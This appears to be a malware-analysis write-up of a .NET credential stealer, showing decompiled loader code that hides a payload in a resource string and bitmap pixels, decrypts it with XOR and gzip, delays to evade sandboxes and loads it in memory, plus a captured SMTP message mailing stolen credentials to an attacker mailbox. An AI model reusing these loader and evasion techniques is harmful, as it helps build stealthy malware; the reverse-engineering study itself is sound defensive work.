Execution analysis of a C# sample that reads its payload from a resource file


Continuing my sample-analysis practice.
Original YouTube video walkthrough: https://www.youtube.com/watch?v=deG_-5opR30
Sample: https://app.any.run/tasks/6cdbb3ea-a272-47d5-b01e-0a41a1ae16f3/

Analysis process

Downloaded the sample; it is a .NET binary, so straight into dnSpy to decompile.

Follow the entry point:

using System;
using System.Windows.Forms;


namespace WinFormsFirstOne
{
    // Token: 0x02000013 RID: 19
    internal static class Program
    {
        // Token: 0x06000096 RID: 150 RVA: 0x000068AA File Offset: 0x00004AAA
        [STAThread]
        private static void Main()
        {
            Application.EnableVisualStyles();
            Application.SetCompatibleTextRenderingDefault(false); // application-wide default for a property defined on some controls; stock WinForms boilerplate
            Application.Run(new Form1());
        }
    }
}

Follow the first call, EnableVisualStyles.

Tracing further:

public static void EnableVisualStyles()
{
            string text = null;
            new FileIOPermission(PermissionState.None) // Code Access Security permission assert
            {
                AllFiles = FileIOPermissionAccess.PathDiscovery // access to information in the path itself (user names, directory layout), not to the files or folders the path points to
            }.Assert(); // code calling this method may access resources guarded by a demand for this permission
            try
            {
                text = typeof(Application).Assembly.Location; // path of System.Windows.Forms.dll itself; nothing here reads the sample's resources
            }
            }
            finally
            {
                CodeAccessPermission.RevertAssert();
            }
            if (text != null)
            {
                Application.EnableVisualStylesInternal(text, 101); // 101 = ID of the native manifest resource embedded in System.Windows.Forms.dll
            }
}




private static void EnableVisualStylesInternal(string assemblyFileName, int nativeResourceID) // literally "enable visual styles, internal"
{
            Application.useVisualStyles = UnsafeNativeMethods.ThemingScope.CreateActivationContext(assemblyFileName, nativeResourceID);
}


////////////////////////
public static bool CreateActivationContext(string dllPath, int nativeResourceManifestID) // nativeResourceManifestID: ID of the native manifest resource
{
                Type typeFromHandle = typeof(UnsafeNativeMethods.ThemingScope);
                bool result;
                lock (typeFromHandle)
                {
                    if (!UnsafeNativeMethods.ThemingScope.contextCreationSucceeded && OSFeature.Feature.IsPresent(OSFeature.Themes))
                    {
                        UnsafeNativeMethods.ThemingScope.enableThemingActivationContext = default(UnsafeNativeMethods.ThemingScope.ACTCTX);
                        UnsafeNativeMethods.ThemingScope.enableThemingActivationContext.cbSize = Marshal.SizeOf(typeof(UnsafeNativeMethods.ThemingScope.ACTCTX));
                        UnsafeNativeMethods.ThemingScope.enableThemingActivationContext.lpSource = dllPath;
                        UnsafeNativeMethods.ThemingScope.enableThemingActivationContext.lpResourceName = (IntPtr)nativeResourceManifestID;
                        UnsafeNativeMethods.ThemingScope.enableThemingActivationContext.dwFlags = 8U;
                        UnsafeNativeMethods.ThemingScope.hActCtx = UnsafeNativeMethods.ThemingScope.CreateActCtx(ref UnsafeNativeMethods.ThemingScope.enableThemingActivationContext); // CreateActCtx creates an activation context (Common Controls v6 theming); this whole path is standard WinForms start-up
                        UnsafeNativeMethods.ThemingScope.contextCreationSucceeded = (UnsafeNativeMethods.ThemingScope.hActCtx != new IntPtr(-1));
                    }
                    result = UnsafeNativeMethods.ThemingScope.contextCreationSucceeded;
                }
                return result;
}

After all of that there is still nothing of substance. The lesson: Application.EnableVisualStyles and everything under it is System.Windows.Forms code, not the sample's; dnSpy happily decompiles referenced framework assemblies, so check which assembly a method lives in before tracing into it. Back at the entry point, new Form1() only instantiates the window's controls, with nothing useful either.

Stuck at that point, I followed the video, which goes straight to the function that processes the resource file.

Following into the resources, you can see the SAS string defined there.

Follow the Rate function (tip: when you cannot find where a function is used, right-click it in dnSpy and choose "Analyze", which lists its callers).

The analysis:

using System;


namespace WinFormsFirstOne
{
    // Token: 0x02000009 RID: 9
    internal class Castle
    {
        // Token: 0x04000032 RID: 50
        public static string Ir = "cnJCh";


        // Token: 0x04000033 RID: 51
        public static string Iq = "HvXUw";


        // Token: 0x04000034 RID: 52
        public static string Le = "Load";
    }
}




(BindingFlags.InvokeMethod has the value 256, which is what the decompiler shows as the literal in the InvokeMember call below.)

using System;
using System.Reflection;
using Microsoft.VisualBasic.CompilerServices;
using WinFormsFirstOne.Properties; // generated Resources class; namespace inferred from the ".Properties.Resources" pattern used later


namespace WinFormsFirstOne
{
    // Class name as shown by dnSpy; only the two members followed here are listed.
    internal class FarmDestination
    {
        public static string Select(string s)
        {
            char[] array = s.ToCharArray();
            Array.Reverse(array); // reverse the string
            return new string(array);
        }


        // Token: 0x0600006C RID: 108 RVA: 0x00004BD0 File Offset: 0x00002DD0
        public string Rate(object[] io)
        {
            // Stage 1: undo the string transform on the SAS resource and base64-decode it.
            byte[] array = Convert.FromBase64String(FarmDestination.Select(Resources.SAS.Replace("Quotes_on_Life", "A")));
            // Equivalent to: Assembly assembly = Assembly.Load(array);
            // The type and method names are assembled at run time so that
            // "System.Reflection.Assembly" and "Load" never appear as plain strings.
            Assembly assembly = (Assembly)Type.GetType("System@@@@@^Reflection@@@@@^Assembly".Replace("@@@@@^", ".")).InvokeMember(Castle.Le, BindingFlags.InvokeMethod, null, null, new object[]
            {
                array
            });
            // Reflection again: assembly.GetType("Dژ家ycحElj她s.的Fڵ是rn太Wظ").GetMethod("执ZciGڤjPز")
            MethodInfo o = (MethodInfo)LateBinding.LateGet(assembly.GetType("Dژ家ycحElj她s.的Fڵ是rn太Wظ"), null, "GetMethod", new object[]
            {
                "执ZciGڤjPز"
            }, null, null);
            // Select("ekovnI") == "Invoke": o.Invoke(null, io), i.e. call the static method
            // with io as its argument array (the three strings smethod_4 below takes).
            LateBinding.LateGet(o, null, FarmDestination.Select("ekovnI"), new object[]
            {
                null,
                io
            }, null, null);
            return "Biara";
        }
    }
}

Decode the SAS variable:
1. Replace Quotes_on_Life with A
2. Reverse the string (the base64 text is stored reversed)
3. Base64 decode
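The three steps as a stand-alone decoder, added here as an example (it is not code from the post or from the sample). The test strings are built inline; encode_sas is the inverse of the sample's routine and exists only to produce that input, and the "PE" check is a plain DOS/PE header check to run before writing the blob out for a second dnSpy pass.

```python
import base64

MARKER = "Quotes_on_Life"  # the string the packer substituted for every 'A'


def decode_sas(sas: str) -> bytes:
    """Undo the transform on the SAS resource string, in the sample's order:
    1. put the 'A' characters back, 2. reverse the string, 3. base64-decode.
    Reversing before decoding matters: the padding '=' sits at the front."""
    restored = sas.replace(MARKER, "A")
    return base64.b64decode(restored[::-1])


def encode_sas(payload: bytes) -> str:
    """Inverse of decode_sas, written here only to build test input (not the
    packer's own code): base64, reverse, mask every 'A'."""
    return base64.b64encode(payload).decode("ascii")[::-1].replace("A", MARKER)


def looks_like_pe(blob: bytes) -> bool:
    """Sanity check on the decoded blob: 'MZ' header and an e_lfanew that
    points at the 'PE\\0\\0' signature."""
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(blob[0x3C:0x40], "little")
    return blob[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


# Constructed sample: a fake 0x40-byte DOS header with e_lfanew = 0x40, then
# the PE signature. It is not a real binary.
SAMPLE_PAYLOAD = (b"MZ" + b"\x00" * 0x3A + (0x40).to_bytes(4, "little")
                  + b"PE\x00\x00" + b"\x00" * 20)
SAMPLE_SAS = encode_sas(SAMPLE_PAYLOAD)

if __name__ == "__main__":
    out = decode_sas(SAMPLE_SAS)
    print(SAMPLE_SAS[:40], "...")
    print("decoded", len(out), "bytes; PE header:", looks_like_pe(out))
```

On the real sample, feed decode_sas the SAS string copied out of dnSpy's resource view and write the result to disk; if looks_like_pe fails, the replace/reverse order was wrong.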

Save the result to a file, load it in dnSpy as well, and trace the called function 执ZciGڤjPز. It calls a few functions and then loads their result with Assembly.Load.

Tracing هmyڕDئفTH:
1. Gets the file of the entry assembly
2. Creates a new ResourceManager
3. Returns a Bitmap

Tracing بظxئ家g希顾太太Bحه:
(looks like the decryption routine)

Tracing c商ەڤG首首rءsە:
Reads data out of a gzip stream and returns it.

Normally you would break on Assembly.Load to catch the decrypted result. The author dumped it that way and ran the dump through de4dot.exe, which gives the cleaned-up listing below (the GClass0 / smethod_N names are de4dot's renames, not the original ones).

Finally the entry point is identified (smethod_4):

using System;
using System.Collections.Generic;
using System.Drawing;
using System.IO;
using System.IO.Compression;
using System.Reflection;
using System.Resources;
using System.Text;
using System.Threading;


namespace ns1
{
    // Token: 0x02000002 RID: 2
    public class GClass0
    {
        // Token: 0x06000001 RID: 1 RVA: 0x00002064 File Offset: 0x00000264
        // Last stage of the chain: the first 4 bytes are the little-endian length of the
        // plaintext, the rest is a gzip stream. Note the single Read call: GZipStream may
        // return fewer bytes than requested, which the author simply ignores.
        public static byte[] smethod_0(byte[] byte_0)
        {
            byte[] result;
            using (MemoryStream memoryStream = new MemoryStream(byte_0))
            {
                byte[] array = new byte[4];
                memoryStream.Read(array, 0, 4);
                int num = BitConverter.ToInt32(array, 0);
                using (GZipStream gzipStream = new GZipStream(memoryStream, CompressionMode.Decompress))
                {
                    byte[] array2 = new byte[num];
                    gzipStream.Read(array2, 0, num);
                    result = array2;
                }
            }
            return result;
        }


        // Token: 0x06000002 RID: 2 RVA: 0x000020E4 File Offset: 0x000002E4
        // XOR decryption. The last input byte XOR 112 gives a per-sample byte; every byte is
        // XORed with it and with the ASCII key cycled byte by byte. The Array.Resize at the
        // end drops the trailing key byte.
        public static byte[] smethod_1(byte[] byte_0, string string_1)
        {
            byte[] bytes = Encoding.ASCII.GetBytes(string_1); // key
            int num = (int)(byte_0[byte_0.Length - 1] ^ 112);
            byte[] array = new byte[byte_0.Length + 1];
            int num2 = 0;
            for (int i = 0; i <= byte_0.Length - 1; i++)
            {
                array[i] = (byte)((int)byte_0[i] ^ num ^ (int)bytes[num2]);
                if (num2 == string_1.Length - 1)
                {
                    num2 = 0;
                }
                else
                {
                    num2++;
                }
            }
            Array.Resize<byte>(ref array, byte_0.Length - 1);
            return array;
        }


        // Token: 0x06000003 RID: 3 RVA: 0x00002164 File Offset: 0x00000364
        // Pulls the ciphertext out of the bitmap: column by column, top to bottom, skipping
        // fully transparent pixels, three bytes (R, G, B) per pixel. Alpha carries no data.
        private static byte[] smethod_2(Bitmap bitmap_0)
        {
            List<byte> list = new List<byte>();
            checked
            {
                int num = bitmap_0.Width - 1;
                for (int i = 0; i <= num; i++)
                {
                    int num2 = bitmap_0.Height - 1;
                    for (int j = 0; j <= num2; j++)
                    {
                        Color pixel = bitmap_0.GetPixel(i, j);
                        if (pixel != Color.FromArgb(0, 0, 0, 0))
                        {
                            list.InsertRange(list.Count, new byte[]
                            {
                                pixel.R,
                                pixel.G,
                                pixel.B
                            });
                        }
                    }
                }
                return list.ToArray();
            }
        }


        // Token: 0x06000004 RID: 4 RVA: 0x00002208 File Offset: 0x00000408
        // Loads the bitmap named string_1 from the entry assembly's <string_2>.Properties.Resources.
        public static Bitmap smethod_3(string string_1, string string_2)
        {
            ResourceManager resourceManager = new ResourceManager(string_2 + ".Properties.Resources", Assembly.GetEntryAssembly());
            return (Bitmap)resourceManager.GetObject(string_1);
        }


        // Token: 0x06000005 RID: 5 RVA: 0x0000223C File Offset: 0x0000043C
        // Entry point of the stage-2 loader: string_1 = resource name, string_2 = XOR key,
        // string_3 = resource namespace prefix.
        public static void smethod_4(string string_1, string string_2, string string_3)
        {
            Thread.Sleep(38000); // 38 s delay, long enough to outlast short sandbox runs
            byte[] rawAssembly = GClass0.smethod_0(GClass0.smethod_1(GClass0.smethod_2(GClass0.smethod_3(string_1, string_3)), string_2));
            Assembly.Load(rawAssembly).EntryPoint.Invoke(0, null); // loaded from memory; the decrypted assembly never touches disk
            Environment.Exit(0); // never returns to the WinForms host
        }


        // Token: 0x04000001 RID: 1
        private string string_0 = "You will face many defeats in life, but never let yourself be defeated.";
    }
}
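The chain smethod_3 → smethod_2 → smethod_1 → smethod_0 re-implemented in Python so the next stage can be recovered without running the sample. This is an added example, not code from the post or from the sample. The bitmap is modelled as a column-indexed list of (A, R, G, B) tuples instead of a System.Drawing.Bitmap so it runs without Pillow (on a real sample you would fill it from PIL's Image.getpixel); build_sample_image is a constructed inverse of the chain used only to make test input, and the key string and payload are made up.

```python
import gzip
import struct
import zlib

KEY_BYTE_MASK = 112  # constant smethod_1 XORs into the trailing key byte


def pixels_to_bytes(image, width, height):
    """smethod_2: walk the bitmap column by column (x outer, y inner), skip
    pixels whose A, R, G and B are all zero, and emit R, G, B of the rest.
    image[x][y] is an (A, R, G, B) tuple."""
    out = bytearray()
    for x in range(width):
        for y in range(height):
            a, r, g, b = image[x][y]
            if (a, r, g, b) != (0, 0, 0, 0):
                out += bytes((r, g, b))
    return bytes(out)


def xor_decrypt(data, key):
    """smethod_1: last byte XOR 112 gives the per-sample byte num; every byte
    is XORed with num and with the ASCII key cycled byte by byte. The
    Array.Resize(ref array, Length - 1) then drops the trailing key byte."""
    kb = key.encode("ascii")
    num = data[-1] ^ KEY_BYTE_MASK
    plain = bytearray(len(data))
    for i, c in enumerate(data):
        plain[i] = c ^ num ^ kb[i % len(kb)]
    return bytes(plain[: len(data) - 1])


def gunzip_prefixed(blob):
    """smethod_0: 4-byte little-endian plaintext length, then one gzip member.
    zlib.decompressobj stops at the end of the member like GZipStream does,
    so anything after it is ignored."""
    n = struct.unpack("<i", blob[:4])[0]
    if blob[4:6] != b"\x1f\x8b":
        raise ValueError("no gzip magic after the length prefix: wrong key or wrong resource")
    d = zlib.decompressobj(16 + zlib.MAX_WBITS)
    return d.decompress(blob[4:])[:n]


def unpack_stage2(image, width, height, key):
    """smethod_4 minus the Sleep and the Assembly.Load: returns the assembly bytes."""
    return gunzip_prefixed(xor_decrypt(pixels_to_bytes(image, width, height), key))


def build_sample_image(payload, key, num=0x5A, width=8):
    """Constructed inverse of the chain, used only to produce test input."""
    blob = struct.pack("<i", len(payload)) + gzip.compress(payload)
    blob += b"\x00" * (-(len(blob) + 1) % 3)  # ciphertext + key byte must fill whole pixels
    kb = key.encode("ascii")
    cipher = bytes(blob[i] ^ num ^ kb[i % len(kb)] for i in range(len(blob)))
    cipher += bytes([num ^ KEY_BYTE_MASK])
    n_pix = len(cipher) // 3
    height = -(-n_pix // width)
    image = [[(0, 0, 0, 0)] * height for _ in range(width)]  # transparent pixels are skipped
    for k in range(n_pix):
        x, y = divmod(k, height)
        r, g, b = cipher[3 * k: 3 * k + 3]
        image[x][y] = (255, r, g, b)
    return image, width, height


# Constructed payload standing in for the real stage-2 assembly.
SAMPLE_PAYLOAD = b"MZ\x90\x00" + b"constructed stage-2 payload " * 4
SAMPLE_KEY = "constructed_key"  # the real key is string_2, handed in by the stage-1 loader

if __name__ == "__main__":
    img, w, h = build_sample_image(SAMPLE_PAYLOAD, SAMPLE_KEY)
    out = unpack_stage2(img, w, h, SAMPLE_KEY)
    print(w, "x", h, "bitmap ->", len(out), "bytes, header", out[:2])
```

Two things the listing does not make obvious and the code above checks: the traversal order is column-major (x outer loop), so a row-major pixel walk yields garbage, and a wrong key fails immediately at the gzip magic rather than at the end of the stream.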

With this many layers of encryption it is too tedious to tell from static analysis alone what ends up executing. The remaining options are a sandbox run, or dumping .NET memory at runtime (in the end it runs another executable).
The author used MegaDumper to dump that executable at runtime: https://github.com/CodeCracker-Tools/MegaDumper

Dropping the dump into dnSpy gives the code below. One caveat a reader should not miss: this is the .NET Framework's own RegSvcs.exe (the .NET Services Installation Tool; note the RegistrationHelper calls and the "RegSvcs_CopyrightMsg" resource with version 4.7.3062.0). The stage-2 payload evidently starts that legitimate host and runs inside it, so the dump shows the host's main assembly, not the stealer. The stealer's own logic, including the SMTP exfiltration seen further down, lives in the injected module, which is the one worth dumping.

using System;
using System.EnterpriseServices;
using System.Globalization;
using System.IO;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Runtime.Remoting;
using System.Text;
using System.Threading;


// Token: 0x02000003 RID: 3
[ComVisible(false)]
public class RegSvcs
{
    // Token: 0x06000005 RID: 5
    [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
    private static extern int SearchPath(string path, string fileName, string extension, int numBufferChars, StringBuilder buffer, int[] filePart);


    // Token: 0x06000007 RID: 7 RVA: 0x0000209C File Offset: 0x0000029C
    private static RegistrationHelper GetRegistrationHelper(bool bCreateAppDomain, out AppDomain domain)
    {
        RegistrationHelper result = null;
        domain = null;
        if (!bCreateAppDomain)
        {
            result = new RegistrationHelper();
        }
        else
        {
            string directoryName = Path.GetDirectoryName(RegSvcs.regConfig.AssemblyFile);
            domain = AppDomain.CreateDomain("RegSvcs", null, new AppDomainSetup
            {
                ApplicationBase = directoryName
            });
            if (domain != null)
            {
                ObjectHandle objectHandle = domain.CreateInstance(typeof(RegistrationHelper).Assembly.FullName, typeof(RegistrationHelper).FullName);
                if (objectHandle != null)
                {
                    result = (RegistrationHelper)objectHandle.Unwrap();
                }
            }
        }
        return result;
    }


    // Token: 0x06000008 RID: 8 RVA: 0x00002124 File Offset: 0x00000324
    private static string FindAssembly(string name)
    {
        StringBuilder stringBuilder = new StringBuilder(261);
        if (RegSvcs.SearchPath(null, name, null, stringBuilder.Capacity + 1, stringBuilder, null) == 0)
        {
            return null;
        }
        return stringBuilder.ToString();
    }


    // Token: 0x06000009 RID: 9 RVA: 0x00002158 File Offset: 0x00000358
    private static bool IsAssemblyInGAC(string name)
    {
        try
        {
            Assembly assembly = Assembly.Load(name);
        }
        catch
        {
            return false;
        }
        return true;
    }


    // Token: 0x0600000A RID: 10 RVA: 0x00002188 File Offset: 0x00000388
    [MTAThread]
    public static int Main(string[] args)
    {
        int result;
        try
        {
            result = RegSvcs.UnsafeMain(args);
        }
        catch
        {
            result = 1;
        }
        return result;
    }


    // Token: 0x0600000B RID: 11 RVA: 0x000021B4 File Offset: 0x000003B4
    public static int UnsafeMain(string[] args)
    {
        AppDomain appDomain = null;
        RegSvcs.DoConsoleInitialization();
        try
        {
            RegSvcs.ParseArguments(args); // dispatch on the command line
            if (RegSvcs.logoOutput)
            {
                RegSvcs.PrintLogo();
            }
            if (RegSvcs.regConfig.AssemblyFile != null)
            {
                string text = RegSvcs.FindAssembly(RegSvcs.regConfig.AssemblyFile);
                RegistrationHelper registrationHelper;
                if (text != null)
                {
                    RegSvcs.regConfig.AssemblyFile = text;
                    registrationHelper = RegSvcs.GetRegistrationHelper(true, out appDomain);
                }
                else
                {
                    if (!RegSvcs.IsAssemblyInGAC(RegSvcs.regConfig.AssemblyFile))
                    {
                        throw new RegistrationException(Resource.FormatString("RegSvcs_AssemblyNotFound", RegSvcs.regConfig.AssemblyFile));
                    }
                    registrationHelper = RegSvcs.GetRegistrationHelper(false, out appDomain);
                }
                if (RegSvcs.uninstallApplication)
                {
                    registrationHelper.UninstallAssemblyFromConfig(ref RegSvcs.regConfig);
                    if (RegSvcs.successOutput)
                    {
                        Console.WriteLine(Resource.FormatString("RegSvcs_UninstallSuccess", RegSvcs.regConfig.AssemblyFile));
                    }
                }
                else
                {
                    registrationHelper.InstallAssemblyFromConfig(ref RegSvcs.regConfig);
                    if (RegSvcs.successOutput)
                    {
                        if (RegSvcs.regConfig.Partition != null && RegSvcs.regConfig.Application != null)
                        {
                            Console.WriteLine(Resource.FormatString("RegSvcs_InstallSuccess2", new string[]
                            {
                                RegSvcs.regConfig.AssemblyFile,
                                RegSvcs.regConfig.Application,
                                RegSvcs.regConfig.Partition,
                                RegSvcs.regConfig.TypeLibrary
                            }));
                        }
                        else if (RegSvcs.regConfig.Application != null)
                        {
                            Console.WriteLine(Resource.FormatString("RegSvcs_InstallSuccess", RegSvcs.regConfig.AssemblyFile, RegSvcs.regConfig.Application, RegSvcs.regConfig.TypeLibrary));
                        }
                        else
                        {
                            Console.WriteLine(Resource.FormatString("RegSvcs_NoServicedComponents"));
                        }
                    }
                }
            }
        }
        catch (UsageException ex)
        {
            if (RegSvcs.logoOutput)
            {
                RegSvcs.PrintLogo();
            }
            Console.WriteLine(ex.Message);
            return ex.ReturnCode;
        }
        catch (RegistrationException ex2)
        {
            string msg;
            if (RegSvcs.uninstallApplication)
            {
                msg = Resource.FormatString("RegSvcs_UninstallError");
            }
            else
            {
                msg = Resource.FormatString("RegSvcs_InstallError");
            }
            RegSvcs.DumpExceptions(msg, ex2, false);
            if (ex2.InnerException != null)
            {
                if (ex2.InnerException is COMException)
                {
                    COMException ex3 = (COMException)ex2.InnerException;
                    if (ex3.ErrorCode != 0)
                    {
                        return ex3.ErrorCode;
                    }
                    return 1;
                }
            }
            else if (ex2.ErrorInfo != null)
            {
                foreach (RegistrationErrorInfo registrationErrorInfo in ex2.ErrorInfo)
                {
                    if (registrationErrorInfo.ErrorCode != 0)
                    {
                        return registrationErrorInfo.ErrorCode;
                    }
                }
            }
            return 1;
        }
        catch (COMException ex4)
        {
            RegSvcs.DumpExceptions(Resource.FormatString("RegSvcs_CatalogError"), ex4, false);
            if (ex4.ErrorCode != 0)
            {
                return ex4.ErrorCode;
            }
            return 1;
        }
        catch (Exception e)
        {
            RegSvcs.DumpExceptions(Resource.FormatString("RegSvcs_UnknownError"), e, true);
            return 1;
        }
        finally
        {
            if (appDomain != null)
            {
                AppDomain.Unload(appDomain);
            }
        }
        return 0;
    }


    // Token: 0x0600000C RID: 12 RVA: 0x000024FC File Offset: 0x000006FC
    private static void DoConsoleInitialization()
    {
        Thread.CurrentThread.CurrentUICulture = CultureInfo.CurrentUICulture.GetConsoleFallbackUICulture(); // pick a UI culture suitable for a console app when the GUI one is not
        if (Console.OutputEncoding.CodePage != 65001 && Console.OutputEncoding.CodePage != Thread.CurrentThread.CurrentUICulture.TextInfo.OEMCodePage && Console.OutputEncoding.CodePage != Thread.CurrentThread.CurrentUICulture.TextInfo.ANSICodePage) // console encoding is neither UTF-8 nor the culture's OEM/ANSI code page
        {
            Thread.CurrentThread.CurrentUICulture = new CultureInfo("en-US"); // fall back to en-US
        }
    }


    // Token: 0x0600000D RID: 13 RVA: 0x00002584 File Offset: 0x00000784
    private static void DumpExceptions(string msg, Exception e, bool ename)
    {
        Console.WriteLine("\n" + msg);
        int num = 1;
        while (e != null)
        {
            if (ename || e.Message == null || e.Message.Length == 0)
            {
                Console.WriteLine(string.Concat(new object[]
                {
                    num,
                    ": ",
                    e.GetType().FullName,
                    " - ",
                    e.Message
                }));
            }
            else
            {
                Console.WriteLine(num + ": " + e.Message);
            }
            if (e is RegistrationException)
            {
                RegistrationErrorInfo[] errorInfo = ((RegistrationException)e).ErrorInfo;
                if (errorInfo != null)
                {
                    foreach (RegistrationErrorInfo registrationErrorInfo in errorInfo)
                    {
                        if (registrationErrorInfo.MinorRef.ToLower(CultureInfo.InvariantCulture) != "<invalid>")
                        {
                            Console.WriteLine(string.Concat(new string[]
                            {
                                "    ",
                                registrationErrorInfo.Name,
                                ".",
                                registrationErrorInfo.MinorRef,
                                ": ",
                                registrationErrorInfo.ErrorString
                            }));
                        }
                        else
                        {
                            Console.WriteLine("    " + registrationErrorInfo.Name + ": " + registrationErrorInfo.ErrorString);
                        }
                    }
                }
            }
            num++;
            e = e.InnerException;
        }
    }


    // Token: 0x0600000E RID: 14 RVA: 0x000026EE File Offset: 0x000008EE
    private static void PrintLogo()
    {
        Console.WriteLine(Resource.FormatString("RegSvcs_CopyrightMsg", "4.7.3062.0", CommonResStrings.CopyrightForCmdLine));
    }


    // Token: 0x0600000F RID: 15 RVA: 0x0000270C File Offset: 0x0000090C
    private static bool IsArgument(string arg, string check)
    {
        string b = arg.ToLower(CultureInfo.InvariantCulture);
        return "/" + check == b || "-" + check == b;
    }


    // Token: 0x06000010 RID: 16 RVA: 0x0000274C File Offset: 0x0000094C
    private static bool IsPrefixArgument(string arg, string check, ref string prefix)
    {
        string text = arg.ToLower(CultureInfo.InvariantCulture);
        prefix = null;
        if (arg.StartsWith("/" + check + ":", StringComparison.Ordinal) || arg.StartsWith("-" + check + ":", StringComparison.Ordinal))
        {
            if (arg.Length > check.Length + 2)
            {
                prefix = arg.Substring(check.Length + 2);
            }
            return true;
        }
        return RegSvcs.IsArgument(arg, check);
    }


    // Token: 0x06000011 RID: 17 RVA: 0x000027C4 File Offset: 0x000009C4
    private static void ParseArguments(string[] args) // handle the command-line options
    {
        RegSvcs.regConfig.InstallationFlags = (InstallationFlags.FindOrCreateTargetApplication | InstallationFlags.ReconfigureExistingApplication | InstallationFlags.ReportWarningsToConsole);
        RegSvcs.logoOutput = true;
        RegSvcs.successOutput = true;
        RegSvcs.uninstallApplication = false;
        if (args.Length < 1)
        {
            throw new UsageException(0);
        }
        int i;
        for (i = 0; i < args.Length; i++)
        {
            string text = null;
            if (RegSvcs.IsArgument(args[i], "?") || RegSvcs.IsArgument(args[i], "help"))
            {
                throw new UsageException(0);
            }
            if (RegSvcs.IsArgument(args[i], "c"))
            {
                RegSvcs.regConfig.InstallationFlags |= InstallationFlags.CreateTargetApplication;
                RegSvcs.regConfig.InstallationFlags &= ~InstallationFlags.FindOrCreateTargetApplication;
            }
            else if (RegSvcs.IsArgument(args[i], "fc"))
            {
                RegSvcs.regConfig.InstallationFlags |= InstallationFlags.FindOrCreateTargetApplication;
            }
            else if (RegSvcs.IsArgument(args[i], "exapp"))
            {
                RegSvcs.regConfig.InstallationFlags &= ~(InstallationFlags.CreateTargetApplication | InstallationFlags.FindOrCreateTargetApplication);
            }
            else if (RegSvcs.IsArgument(args[i], "extlb"))
            {
                RegSvcs.regConfig.InstallationFlags |= InstallationFlags.ExpectExistingTypeLib;
            }
            else if (RegSvcs.IsPrefixArgument(args[i], "tlb", ref text))
            {
                RegSvcs.regConfig.TypeLibrary = text;
            }
            else if (RegSvcs.IsArgument(args[i], "reconfig"))
            {
                RegSvcs.regConfig.InstallationFlags |= InstallationFlags.ReconfigureExistingApplication;
            }
            else if (RegSvcs.IsArgument(args[i], "noreconfig"))
            {
                RegSvcs.regConfig.InstallationFlags &= ~InstallationFlags.ReconfigureExistingApplication;
            }
            else if (RegSvcs.IsArgument(args[i], "nologo"))
            {
                RegSvcs.logoOutput = false;
            }
            else if (RegSvcs.IsArgument(args[i], "quiet"))
            {
                RegSvcs.regConfig.InstallationFlags &= ~InstallationFlags.ReportWarningsToConsole;
                RegSvcs.logoOutput = false;
                RegSvcs.successOutput = false;
            }
            else if (RegSvcs.IsArgument(args[i], "u"))
            {
                RegSvcs.uninstallApplication = true;
            }
            else if (RegSvcs.IsArgument(args[i], "componly"))
            {
                RegSvcs.regConfig.InstallationFlags |= InstallationFlags.ConfigureComponentsOnly;
            }
            else if (RegSvcs.IsPrefixArgument(args[i], "appname", ref text))
            {
                RegSvcs.regConfig.Application = text;
            }
            else if (RegSvcs.IsPrefixArgument(args[i], "parname", ref text))
            {
                RegSvcs.regConfig.Partition = text;
            }
            else if (RegSvcs.IsPrefixArgument(args[i], "appdir", ref text))
            {
                RegSvcs.regConfig.ApplicationRootDirectory = text;
            }
            else
            {
                if (args[i].StartsWith("/", StringComparison.Ordinal) || args[i].StartsWith("-", StringComparison.Ordinal))
                {
                    throw new UsageException(1, Resource.FormatString("RegSvcs_InvalidOption", args[i]));
                }
                break;
            }
        }
        if (i > args.Length)
        {
            throw new UsageException(1);
        }
        int num = args.Length - i;
        if (num == 0)
        {
            throw new UsageException(1, Resource.FormatString("RegSvcs_NotEnoughArgs"));
        }
        if (num == 1)
        {
            RegSvcs.regConfig.AssemblyFile = args[i];
            return;
        }
        if (num == 2)
        {
            RegSvcs.regConfig.AssemblyFile = args[i];
            RegSvcs.regConfig.Application = args[i + 1];
            RegSvcs.regConfig.TypeLibrary = null;
            return;
        }
        if (num == 3)
        {
            RegSvcs.regConfig.AssemblyFile = args[i];
            RegSvcs.regConfig.Application = args[i + 1];
            RegSvcs.regConfig.TypeLibrary = args[i + 2];
            return;
        }
        throw new UsageException(1, Resource.FormatString("RegSvcs_ToManyArgs"));
    }


    // Token: 0x04000002 RID: 2
    private const int MAX_PATH = 260;


    // Token: 0x04000003 RID: 3
    private static RegistrationConfig regConfig = new RegistrationConfig();


    // Token: 0x04000004 RID: 4
    private static bool logoOutput;


    // Token: 0x04000005 RID: 5
    private static bool successOutput;


    // Token: 0x04000006 RID: 6
    private static bool uninstallApplication;
}

Looking at the network traffic:
the first thing sent is an SMTP AUTH exchange to log in to the mail server.

The base64 credential decodes to: info@stankovic.hr

After authentication it collects host information and mails it, together with harvested credentials, to that same mailbox. The captured message, with the quoted-printable body decoded (on the wire the lines are wrapped with "=" soft breaks and the CRLFs between fields are sent as =0D=0A):

MIME-Version: 1.0
From: info@stankovic.hr
To: info@stankovic.hr
Date: 28 Jul 2020 20:46:04 +0100
Subject: PW_admin/USER-PC
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: quoted-printable

Time: 07/28/2020 20:45:57
User Name: admin
Computer Name: USER-PC
OSFullName: Microsoft Windows 7 Professional
CPU: Intel(R) Core(TM) i5-6400 CPU @ 2.70GHz
RAM: 3583.61 MB
<hr>
URL:192.168.1.1
Username:honey@pot.com
Password:honeypass356
Application:Outlook
<hr>
URL:https://m.facebook.com/
Username:honey@pot.com
Password:honeypass356
Application:Chrome
<hr>
URL:https://m.facebook.com
Username:honey@pot.com
Password:honeypass356
Application:Firefox
<hr>
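A small triage parser for this exfil format, added here as an example (it is not part of the post). It takes the raw SMTP message as captured, lets the standard email module undo the quoted-printable body (soft "=" line breaks and =0D=0A sequences), and splits the body into the host-info block and one record per <hr>. The embedded message is the capture above re-wrapped by hand so the sample is well formed; the wrap positions are therefore constructed and differ from the wire.

```python
import email
import re

# Constructed re-wrapping of the captured message (same content, hand-chosen
# soft-break positions), so the parser has realistic input to run on.
SAMPLE_MESSAGE = (
    "MIME-Version: 1.0\r\n"
    "From: info@stankovic.hr\r\n"
    "To: info@stankovic.hr\r\n"
    "Date: 28 Jul 2020 20:46:04 +0100\r\n"
    "Subject: PW_admin/USER-PC\r\n"
    "Content-Type: text/html; charset=us-ascii\r\n"
    "Content-Transfer-Encoding: quoted-printable\r\n"
    "\r\n"
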